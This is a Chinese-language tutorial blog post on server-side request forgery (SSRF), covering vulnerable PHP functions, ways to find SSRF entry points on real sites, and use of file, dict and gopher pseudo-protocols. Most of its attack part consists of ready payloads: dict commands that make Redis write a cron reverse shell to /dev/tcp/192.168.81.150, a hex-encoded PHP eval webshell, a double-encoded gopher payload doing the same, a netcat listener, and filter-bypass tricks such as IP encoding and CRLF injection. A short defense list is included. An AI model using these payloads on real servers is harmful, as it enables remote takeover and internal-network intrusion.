当前位置：首页 > news >正文

SSRF服务端请求伪造

news 来源：原创 2025/8/4 8:25:11

SSRF：服务端请求伪造

危害：任意文件读取、任意服务探测（通过端口来探测）

例：探测3306端口，看mysql服务是否开启，再通过文件读取，获得mysql配置文件

例：当我们点击链接，服务器就会向后面的url链接发送一个请求，并且把获取到的内容打印到前端页面上，这里我们就可以测试一下是否存在ssrf漏洞，将后面的链接地址改为其他的链接地址试试，可以看到，当我们换成百度的url时，直接跳转了，说明存在ssrf漏洞可以利用。

那么存在ssrf漏洞，我们就可以探测内网中有哪些主机存活，哪些端口是打开的。

产生SSRF漏洞的函数

curl_exec()：发起网络请求，可以设定请求头中的信息

file_get_contents()：仅仅发送网络请求

SSRF找漏洞位置

1、通过url地址分享网页内容信息（比如：我们在b站分享视频到QQ空间，我看到这样的url），那我们就可以修改后面的url地址，进行探测QQ空间内网里面存活的主机有哪些（前提是后台对url没有过滤，存在ssrf漏洞，允许你访问内网）

https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=https%3A%2F%2Fwww.bilibili.com……

2、在线翻译（比如：在有道翻译上翻译其他网页内容）

http://webtrans.yodao.com/webTransPc/index.html#/?url=https%3A%2F%2Fnginx.org%2F&from=auto&to=auto&type=1

3、图片文章收藏等功能（比如在博客园里收藏时会跳出链接）

4、利用谷歌语法找找url关键字

inurl:.php?url=

SSRF漏洞利用

（内网探测、内网信息收集、存活主机和开放端口）

1、可以对外网服务器所在的内网进行端口扫描，获取一些服务的banner信息（头部信息，比如mysql版本）

2、有时候还可以攻击运行在内网或本地的应用程序：比如通过ssrf给内网的redis写定时任务，实现反弹shell

3、对内网web应用进行指纹识别（网站框架和编程语言）

4、攻击内外网的web应用，主要是使用get参数就可以实现攻击（sql注入）

5、利用file协议读取本地文件

6、各种伪协议进行探测：http、file、dict、gopher等

SSRF中URL的伪协议

当我们发现ssrf漏洞后，首先要做的事情就是测试所有可用的伪协议

http:// 主要用于探测主机存活和端口的开放情况
file:/// 从文件系统中获取文件内容 file:///etc/password
dict:// 字典服务协议，访问字典资源 dict:///ip:6379/info
gopher:// 分布式文档传递服务，可以使用gopherus生产payload

sftp://SSH文件传输协议或者安全文件传输协议
ldap:// 轻量级目录访问协议

file协议

主要用于读取服务器本地文件，访问本地的静态资源

dict协议

一般常用来探测内网主机以及端口开放情况，既然能够探测端口，那么可以探测不同端口对应的服务的指纹信息，当然dict协议也可以用来执行一些服务的命令，如redis

主要用途：

1、内网主机探测

2、开放端口探测

3、端口服务指纹探测

4、执行命令

一、dict协议探测端口和服务指纹

dict://192.168.81.151:22
dict://192.168.81.151:3306
dict://192.168.81.151:6379/info

二、dict协议攻击redis，写入定时任务，进行反弹shell

centos系统定时任务路径：/var/spool/cron

debian系统定时任务路径：/var/spool/cron/crontabs

dict://192.168.81.151:6379/config:set:dir:/var/spool/cron
dict://192.168.81.151:6379/config:set:dbfilename:root
dict://192.168.81.151:6379/set:bob:"\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.81.150/1234 0>&1\n\n"
#注意：若payload存在转义或者被过滤或者url编码的情况出现，可以利用16进制写入内容
dict://192.168.81.151:6379/set:bob:"\n\n\x2a/1\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/192.168.81.150/1234\x200\x3e\x261\n\n"
dict://192.168.81.151:6379/save

反弹接收192.168.81.150：nc -lvvp 1234

三、dict协议攻击redis，写入webshell

dict://192.168.81.151:6379/config:set:dbfilename:test.php
dict://192.168.81.151:6379/config:set:dir:/usr/share/nginx/html
dict://192.168.81.151:6379/set:bob:"\n\n<?php @eval($_POST['123']);?>\n\n"
#注意若存在过滤，则利用16进制内容写入
dict://192.168.81.151:6379/set:bob:"\n\n\x3c\x3f\x70\x68\x70\x20\x40\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x27\x31\x32\x33\x27\x5d\x29\x3b\x3f\x3e\n\n"

gopher协议

分布式文档传递服务，利用该服务，用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。

那么它在ssrf中如何使用呢？需要发送多行数据时，就要用到gopher协议，可以用来攻击那些需要交互的应用。

gopher协议支持多行数据一起发送，dict不支持换行符，没有办法进行换行，相当与一次只能执行一条命令，所以不能用来攻击那些需要交互的应用（比如需要认证的redis，每次都要先发送登录密码，紧接着就是要执行的指令）。（比如一次发送反弹shell的四条指令）

gopher协议支持发出get、post请求，可以先截获gey请求包和post请求包，再构成符合gopher协议的请求。（可以提交get、post；必须用%0d%0a换行）

gopher默认端口号为70，他可以以单个url的形式进行post请求，同时支持换行

gopher协议要求：

gopher://192.168.81.151:6379/*数据包
1、gopher协议会吃掉第一个字符*，所以要先放一个没有的字符
2、数据包要进行url编码
3、gopher协议数据流中，url编码之后使用%0d%0a替换字符串中的回车换行
4、数据流末尾使用%0d%0a代表消息结束

redis认可的数据包格式

# *4表示4个参数config、set、dir、/var/spool/cron
# $6表示每个参数的字节长度config长度为6
*4
$6
config
$3
set
$3
dir
$15
/var/spool/cron

这是啥意思呢？就是我们利用gopher协议写入反弹shell的四条指令，每一条的数据包格式都必须是上面redis认可的格式，并且还需要url编码发送，这就很麻烦，但我们可以借助一个工具

下载Gopherus：https://github.com/tarunkant/Gopherus

redis-cli -h 192.168.81.151 set xxx "\n\n* * * * * /bin/bash -i>&/dev/tcp/192.168.81.150/4444 0>&1\n\n"
config set dir /var/spool/cron
config set dbfielname root
save

gopher://192.168.81.151:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/192.168.81.150/1234%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2415%0D%0A/var/spool/cron%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

二次url编码：由于服务端代码是通过curl_exec()函数触发的ssrf，所以我们的payload无用字符后面的内容需要进行二次编码

gopher://192.168.81.151:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252469%250D%250A%250A%250A%252A/1%2520%252A%2520%252A%2520%252A%2520%252A%2520bash%2520-c%2520%2522sh%2520-i%2520%253E%2526%2520/dev/tcp/192.168.81.150/1234%25200%253E%25261%2522%250A%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252415%250D%250A/var/spool/cron%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25244%250D%250Aroot%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

成功：

SSRF漏洞发起应用程序攻击

这里我使用本地127.0.0.1的pikachu作为攻击，探测内网的192.168.81.151主机上的redis

最开始使用file协议没有探测出来，但是换成dict协议就成功探测出6379端口开放

执行info指令，测试是否存在未授权漏洞，和我们在redis客户端执行的命令返回结果一样

SSRF防御

1、过滤返回信息。验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件，那么在把返回结果展示给用户之前先验证返回的信息是否符合标准

2、统一错误信息，避免用户可以根据错误信息来判断远端服务器的端口状态

3、限制请求的端口为http常用端口，比如80、443、8080

4、防火墙策略，内网ip设置黑名单，避免应用被用来获取内网数据，攻击内网

5、禁用不需要的洗衣，仅仅运行http和https请求，可以防止类似于file:///，gopher://，ftp://等引起的问题

6、url网址写死。固定几个网址，其他网址一律不允许访问

SSRF绕过方式

部分存在漏洞，或者可能产生SSRF的功能中做了白名单或者黑名单的处理，来达到阻止对内网服务和资源的攻击和访问，因此想要达到SSRF的攻击，需要对请求参数地址做相关的绕过处理，常见的绕过方式如下：

一、常见的绕过方式

1、限制为http://www.xxx.com域名时（利用@）

例：
http://www.aaa.com@www.bbb.com@www.ccc.com
在对@解析域名中，不同的处理函数存在处理差异，在php中的parse_url中会识别www.ccc.com，而libcurl则识别www.bbb.com
这里前面的www.aaa.com只是用来绕过限制

2、采用短网址绕过，也叫做url短链接

现在有很多的网站进行短链接生成（绕过对内网网址的限制）

3、采用进制转换

例：127.0.0.1 
八进制：0177.0.0.1
十六进制：0x7f.0.0.1
十进制：2130706433

4、利用特殊域名

原理是DNS解析，xip.io可以指向任意域名，即
127.0.0.1.xip.io可以解析为127.0.0.1
（xip.io现在利用不了了）

5、利用[::]

这种写法是ipv6的地址写法，只要对方支持ipv6的地址进行访问就行，需要配置才行，比如nginx就可以配置ipv6来访问。
例：http://192.168.81.151
http://[::192.168.81.151]

6、利用句号

127.0.0.1
127。0。0。1（linux支持，windows不支持）

7、CRLF编码绕过

%0d->0x0d->\r回车
%0a->0x0a->\n换行
进行http头部注入

例：example.com/?url=http://eval.com%0d%0aHOST:fuzz.com%0d%0a

8、利用封闭的字母数字

ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  >>>  example.com
注意：也是linux支持，windows不支持